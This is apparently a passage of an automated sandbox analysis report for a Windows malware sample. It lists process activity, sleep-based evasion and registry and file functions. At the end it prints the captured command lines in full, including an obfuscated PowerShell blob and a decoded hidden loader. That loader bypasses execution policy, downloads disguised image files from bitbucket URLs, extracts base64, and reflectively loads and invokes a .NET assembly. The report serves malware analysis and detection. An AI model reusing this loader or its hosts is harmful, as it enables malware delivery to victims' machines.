        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1556Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1715Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4992Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4355Jump to behavior
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2513
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep count: 1556 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep count: 1715 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4508Thread sleep count: 92 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 964Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5628Thread sleep count: 4992 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5628Thread sleep count: 4355 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776Thread sleep time: -11990383647911201s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5364Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5724Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C22034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF681C22034
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C26710 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF681C26710
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000005.00000002.1546060009.000001EEDDF88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C21D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF681C21D10
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C28714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF681C28714
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exeCode function: 0_2_00007FF681C28A1E SetUnhandledExceptionFilter,0_2_00007FF681C28A1E

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: amsi64_6592.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4640, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTR
        Bypasses PowerShell execution policy
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#CJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"Jump to behavior
